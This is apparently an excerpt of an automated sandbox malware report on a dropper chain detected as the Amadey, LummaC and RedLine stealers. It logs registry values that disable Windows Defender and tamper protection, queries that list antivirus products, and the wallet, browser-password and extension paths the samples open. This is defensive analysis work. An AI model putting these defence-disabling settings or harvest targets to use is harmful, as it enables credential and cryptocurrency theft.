                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021718001\6b06c8a266.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021718001\6b06c8a266.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021719001\24da220eed.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021719001\24da220eed.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021720001\91732ff836.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021720001\91732ff836.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021721001\f53b3c5fe2.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021721001\f53b3c5fe2.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeQueries volume information: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B1CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00B1CBEA
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Disable Windows Defender notifications (registry)
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                    Disable Windows Defender real time protection (registry)
                    Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                    Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                    Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1
                    Disables Windows Defender Tamper protection
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeRegistry value created: TamperProtection 0
                    Modifies windows update settings
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
                    Source: 7620ab885d.exe, 00000009.00000003.2204997924.00000000057BC000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2192229924.00000000057BC000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2289015343.000000000114E000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2245976063.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2314083807.000000000114F000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000002.2316994067.000000000114F000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2246222179.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2549974130.000000000587A000.00000004.00000020.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2488648561.0000000000742000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2726512809.0000000000D09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Amadeys stealer DLL
                    Source: Yara matchFile source: 0.2.cMTqzvmx9u.exe.b00000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.skotes.exe.bd0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.skotes.exe.bd0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: Process Memory Space: 7620ab885d.exe PID: 2456, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 8469cb4d4d.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: b285303eae.exe PID: 7044, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: b9ba85c997.exe PID: 4164, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c130c124d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c1310fe590.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c1310d6568.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c1310fe590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c1310d6568.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.DJj.exe.1b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.2343778793.000001C13114E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2343778793.000001C1310D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2343637701.000001C130C03000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000000.2340764340.00000000001B2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 0a7e8af92e.exe PID: 632, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DJj.exe PID: 3500, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe, type: DROPPED
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                    Source: 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000027CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: 7620ab885d.exe, 00000009.00000003.2153964986.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000027CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR
                    Source: 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3G
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000027CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
                    Source: 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                    Source: 7620ab885d.exe, 00000009.00000003.2153941234.0000000000BF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000027CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: 7620ab885d.exe, 00000009.00000003.2153915003.0000000000BEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Tries to harvest and steal Bitcoin Wallet information
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Preferences
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
